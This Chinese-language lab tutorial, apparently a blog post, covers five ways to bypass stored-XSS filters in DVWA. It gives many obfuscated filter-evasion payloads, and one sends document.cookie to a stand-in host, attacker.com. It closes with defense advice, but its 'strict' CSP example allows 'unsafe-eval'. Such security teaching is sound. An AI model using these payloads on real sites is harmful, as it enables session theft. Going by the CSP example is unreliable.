DVWA靶场实战:5种绕过存储型XSS过滤的骚操作(附Payload)
DVWA靶场实战:5种绕过存储型XSS过滤的骚操作(附Payload)
在Web安全领域,存储型XSS(Stored Cross-Site Scripting)因其持久性和广泛影响范围,一直被视为高危漏洞。DVWA(Damn Vulnerable Web Application)作为经典的Web安全演练平台,其存储型XSS模块设置了从Low到Impossible四个难度等级,模拟了不同强度的防御机制。本文将深入剖析五种突破中高难度过滤的实战技巧,并附可直接复用的攻击Payload。
1. HTML事件属性:突破标签过滤的利器
当传统<script>标签被严格过滤时,HTML事件属性成为绕过防御的首选方案。这类攻击利用HTML元素的内置事件处理器执行JavaScript代码,完全避开对脚本标签的依赖。
典型Payload示例:
<img src="invalid" onerror="alert('XSS via onerror')"> <div onmouseover="alert('XSS via onmouseover')">悬停触发</div> <svg onload="alert('XSS via SVG')"></svg>实战绕过要点:
- 事件选择:优先使用
onerror、onload等自动触发事件,降低用户交互依赖 - 元素多样性:测试
<img>、<iframe>、<body>等不同元素的兼容性 - 属性组合:尝试同时设置多个事件属性增加成功率
注意:现代WAF可能检测常见事件属性,可通过大小写变异(如
oNeRrOr)或部分编码绕过
2. Base64编码:对抗内容检测的隐身术
Base64编码能将恶意脚本转换为无害外观的字符串,特别适合绕过基于关键词匹配的过滤系统。这种技术常与data:协议结合使用,直接嵌入HTML元素。
技术实现流程:
- 将JavaScript代码转换为Base64格式
echo -n "alert('XSS')" | base64 # 输出:YWxlcnQoJ1hTUycp - 构造带解码逻辑的Payload:
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></iframe>
高级变种技巧:
- SVG嵌套:将Base64编码的SVG文件作为图片源
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDov..."/> - 动态解码:通过
atob()函数实时解码执行<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycp'))>
3. Unicode编码:绕过关键词过滤的变形术
Unicode编码可将关键字符转换为转义序列,有效规避对特定关键词的检测。这种方法在对抗简单字符串匹配过滤时尤为有效。
编码对照表:
| 原始字符 | Unicode编码 | HTML实体 |
|---|---|---|
| < | \u003C | < |
| > | \u003E | > |
| " | \u0022 | " |
实战应用案例:
<script>\u0061\u006C\u0065\u0072\u0074('\u0058\u0053\u0053')</script>组合攻击策略:
- 混合使用不同编码形式(部分Unicode+部分明文)
- 结合HTML实体编码制造混淆
- 在字符串操作函数中动态解码:
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>
4. JavaScript协议:链接属性中的隐形杀手
javascript:协议允许在URL上下文中直接执行代码,为绕过标签限制提供了新途径。这种技术特别适用于可设置链接地址的HTML属性。
典型攻击向量:
<a href="javascript:alert(document.domain)">点击劫持</a> <iframe src="javascript:alert('XSS')"></iframe>高级绕过技巧:
- 协议混淆:使用
javascripT:、java%0ascript:等变体 - 结合HTML5特性:
<embed src="javascript:alert('XSS')"> <object data="javascript:alert('XSS')"></object> - 双重编码攻击:
<a href="data:text/html;charset=utf-8,%3Cscript%3Ealert(1)%3C/script%3E">点击</a>
5. 嵌套标签与属性拼接:对抗正则过滤的终极手段
当防御系统采用简单正则表达式过滤时,通过精心构造的标签嵌套和属性分割可有效绕过检测。这种技术需要深入理解浏览器解析HTML的容错机制。
经典绕过模式:
<scr<script>ipt>alert('Bypass')</scr</script>ipt> <img """><script>alert('XSS')</script>">DVWA High难度实战Payload:
<input onfocus=document.write('<img src=http://attacker.com/'+document.cookie+'>') autofocus>防御突破方法论:
- 标签属性溢出:利用未闭合属性突破过滤
<img src=x onerror=alert(1) " - 注释干扰:插入注释破坏过滤正则
<sc<!-- -->ript>alert(1)</sc<!-- -->ript> - 命名空间混淆:利用SVG等XML命名空间特性
<svg><script>alert('XSS')</script></svg>
防御方案设计指南
针对上述攻击手法,企业级防护需要构建多层防御体系:
防御矩阵对比表:
| 攻击类型 | 基础防御 | 增强防护 | 终极方案 |
|---|---|---|---|
| HTML事件属性 | 过滤on*属性 | CSP限制unsafe-inline | 输入内容沙箱化 |
| Base64编码 | 检测data:协议 | 解析嵌套编码内容 | 禁用动态代码执行 |
| Unicode编码 | 统一字符标准化 | 多层级解码检测 | 输出编码上下文感知 |
| JavaScript协议 | 禁止javascript:链接 | 白名单校验URL协议 | 内容安全策略(CSP) |
| 标签嵌套 | 完整标签匹配 | DOM解析一致性检查 | 前端框架自动转义 |
实施要点:
- 输入处理:使用
DOMPurify等专业库进行净化 - 输出编码:根据上下文采用不同编码策略
// HTML上下文 htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); // JavaScript上下文 json_encode($input, JSON_HEX_TAG); - 内容安全策略:配置严格的CSP头
Content-Security-Policy: default-src 'self'; script-src 'unsafe-eval'
在DVWA的Impossible难度中,这些防御措施的组合应用使得存储型XSS几乎无法 exploitation。实际开发中应当参考这种深度防御理念,建立从输入到输出的完整防护链条。